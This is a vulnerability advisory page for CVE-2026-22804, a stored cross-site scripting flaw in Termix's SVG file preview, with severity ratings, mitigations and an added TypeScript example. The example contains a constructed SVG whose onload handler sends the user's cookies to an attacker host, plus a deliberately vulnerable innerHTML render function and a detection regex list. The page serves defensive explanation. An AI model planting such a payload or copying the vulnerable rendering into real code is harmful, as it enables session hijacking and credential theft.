CVE-2026-22804
Published: 12 January 2026
Summary
CVE-2026-22804 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Termix, a web-based server management platform (vendor and product share the name). Its CVSS base score is 8.0 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185). Its exploit-likelihood score sits at the 8.8th percentile (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2026-22804 is a stored cross-site scripting (XSS) vulnerability affecting Termix, a web-based server management platform offering SSH terminal, tunneling, and file editing capabilities. The issue exists in versions 1.7.0 through 1.9.0 within the File Manager component, specifically in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. Termix renders SVG file content without sanitizing it, so whatever markup the file carries becomes live DOM inside the Termix application. The vulnerability is associated with CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-269 (Improper Privilege Management), with a CVSS v3.1 base score of 8.0 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N). The vector encodes the preconditions: high attack complexity (a managed host must already be under the attacker's control), no privileges on Termix itself, user interaction (the preview), and a scope change from the remote file into the Termix web session.
An attacker who has compromised an SSH server managed by Termix can exploit this by planting a malicious SVG file on that server. When a Termix user previews the file in the File Manager, the unsanitized SVG executes arbitrary JavaScript in the origin of the Termix web application. From there the attacker can steal session tokens, alter what the user sees, or drive any action the application lets that user perform; the only requirement is that the user opens the preview.
The GitHub Security Advisory (GHSA-m3cv-5hgp-hv35) confirms the vulnerability and states that it is fixed in Termix version 1.10.0. Update to 1.10.0 or later. Until then, do not preview SVG files from SSH servers that are not fully trusted; if a preview is unavoidable, render the file as an image or as plain text rather than as inline markup.
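The rendering mistake described above, and the render paths that avoid it, as an added TypeScript example. This is not Termix code and does not reproduce FileViewer.tsx; the sink interfaces, the planted file and the attacker hostname are constructed for illustration. It also serves the SI-10 / SI-15 controls listed under Mitigating Controls below: the tripwire is input validation, the image and text paths are output filtering. One detail worth knowing when triaging SVG XSS: markup inserted through innerHTML or React's dangerouslySetInnerHTML never executes <script> elements, so the realistic payload is an event-handler attribute such as onload, which fires the moment the element is attached to the document.

```typescript
// Added example, not Termix code. Shows why handing a remote SVG to innerHTML /
// dangerouslySetInnerHTML is stored XSS, and two render paths that are not.
// Names, interfaces and the attacker host are illustrative.

// Constructed attacker file of the kind a compromised SSH host could serve back to
// the viewer. innerHTML never runs <script> elements, so the realistic payload is
// an event-handler attribute: onload fires as soon as the element is attached.
const PLANTED_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10"
  onload="fetch('https://attacker.example/?c='+encodeURIComponent(document.cookie))">
  <rect width="10" height="10" fill="red"/>
</svg>`;

// Constructed harmless file for comparison.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>`;

// Minimal element shapes so the example runs without a browser DOM.
interface HtmlSink { innerHTML: string }
interface ImgSink { src: string }
interface TextSink { textContent: string }

// VULNERABLE: the file's bytes become live DOM in the application's origin.
// React's dangerouslySetInnerHTML={{ __html: svgText }} is the same operation.
function renderInline(container: HtmlSink, svgText: string): void {
  container.innerHTML = svgText; // onload= handlers now run with the user's session
}

// HARDENED (render path): an <img> shows SVG in a script-less, isolated mode:
// no JavaScript, no event handlers, no external resources, no DOM or cookie access.
// encodeURIComponent avoids a base64 dependency; a blob: URL behaves the same way.
function svgToImgSrc(svgText: string): string {
  return `data:image/svg+xml;charset=utf-8,${encodeURIComponent(svgText)}`;
}

function renderAsImage(img: ImgSink, svgText: string): void {
  img.src = svgToImgSrc(svgText);
}

// HARDENED (source path): showing the markup as a text node is always inert.
function renderAsText(pre: TextSink, svgText: string): void {
  pre.textContent = svgText;
}

// Defence in depth: a tripwire for active content so the UI can refuse a preview
// and tell the user why. This is a heuristic, not a sanitizer; if inline rendering
// is ever required, use a maintained sanitizer with an SVG profile instead.
const ACTIVE_CONTENT: RegExp[] = [
  /<\s*script\b/i,
  /\son[a-z]+\s*=/i,                                  // onload=, onclick=, onbegin= ...
  /href\s*=\s*["']?\s*javascript:/i,                  // also matches xlink:href=
  /<\s*(?:foreignObject|iframe|embed|object)\b/i,     // HTML islands inside SVG
  /<\s*(?:set|animate)\b[^>]*attributeName\s*=\s*["']?(?:xlink:)?href/i, // SMIL href rewrite
];

function hasActiveContent(svgText: string): boolean {
  return ACTIVE_CONTENT.some((re) => re.test(svgText));
}

// What the viewer should do with a given file: never "inline".
function chooseRenderPath(svgText: string): "image" | "refuse" {
  return hasActiveContent(svgText) ? "refuse" : "image";
}

// Stand-alone walk-through returning the observable results.
function demo(): { inlineIsLive: boolean; imgSrc: string; decision: string } {
  const sink: HtmlSink = { innerHTML: "" };
  renderInline(sink, PLANTED_SVG);          // vulnerable: payload is now live DOM
  const img: ImgSink = { src: "" };
  renderAsImage(img, BENIGN_SVG);           // safe: data: URL inside an <img>
  return {
    inlineIsLive: sink.innerHTML.includes("onload="),
    imgSrc: img.src,
    decision: chooseRenderPath(PLANTED_SVG), // "refuse"
  };
}
```

The design point is that the image and text paths are safe regardless of file content, so the tripwire only decides whether a preview is offered at all; it is not what keeps the session safe. A same-origin innerHTML render cannot be rescued by a Content-Security-Policy alone either, because the handler runs as part of the application's own document.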
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-2418
Vulnerability details
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-269 (Improper Privilege Management)
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1185 Browser Session Hijacking
Why these techniques?
Stored XSS via unsanitized SVG runs attacker JavaScript inside the Termix web session, which directly enables browser session hijacking and theft of web session cookies and tokens.
Mitigating Controls (NIST 800-53 r5)
SI-15 requires filtering of information outputs before rendering, directly preventing the execution of malicious JavaScript in unsanitized SVG files previewed in the File Manager.
SI-10 mandates validation of information inputs such as SVG file content, blocking malicious payloads from being processed in the FileViewer component.
SI-2 ensures flaws like the SVG sanitization failure are identified and remediated, as demonstrated by the patch in Termix version 1.10.0.